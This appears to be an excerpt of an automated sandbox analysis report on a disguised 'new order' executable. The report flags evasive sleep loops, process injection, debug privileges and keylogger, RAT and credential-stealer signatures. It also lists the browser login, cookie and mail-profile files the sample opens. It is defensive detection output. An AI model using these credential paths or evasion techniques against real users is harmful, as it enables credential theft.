Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598016 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597797 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597569 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597447 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597336 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597219 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597094 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596961 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596823 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596588 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596318 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596165 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595844 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595653 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595547 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595433 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595313 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595188 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594938 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594484 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594374 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594156 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594047 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 593937 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 593828 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\new order 00041221.exe Window / User API: threadDelayed 7356 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Window / User API: threadDelayed 2473 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 4296 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep count: 37 > 30 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -34126476536362649s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7388 Thread sleep count: 7356 > 30 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7388 Thread sleep count: 2473 > 30 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599328s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -599000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598461s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -598016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597569s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597447s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597336s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597219s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -597094s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596961s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596823s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596588s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596318s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -596165s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595844s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595653s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595547s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595433s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -595063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594719s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594484s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594374s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594266s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594156s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -594047s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -593937s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe TID: 7380 Thread sleep time: -593828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599546 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599437 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599218 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 599000 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598890 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598781 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598672 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598562 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598461 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 598016 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597797 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597569 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597447 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597336 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597219 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 597094 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596961 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596823 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596588 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596318 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 596165 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595844 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595653 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595547 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595433 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595313 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595188 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 595063 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594938 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594828 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594719 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594594 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594484 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594374 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594266 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594156 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 594047 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 593937 Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Thread delayed: delay time: 593828 Jump to behavior
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3710772677.0000000001337000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<5
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: new order 00041221.exe, 00000003.00000002.3714025958.000000000419E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\new order 00041221.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A397B0 LdrInitializeThunk, 3_2_05A397B0
Enables debug privileges
Source: C:\Users\user\Desktop\new order 00041221.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\new order 00041221.exe Memory written: C:\Users\user\Desktop\new order 00041221.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\new order 00041221.exe Process created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Users\user\Desktop\new order 00041221.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Users\user\Desktop\new order 00041221.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000003.00000002.3711414422.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\new order 00041221.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
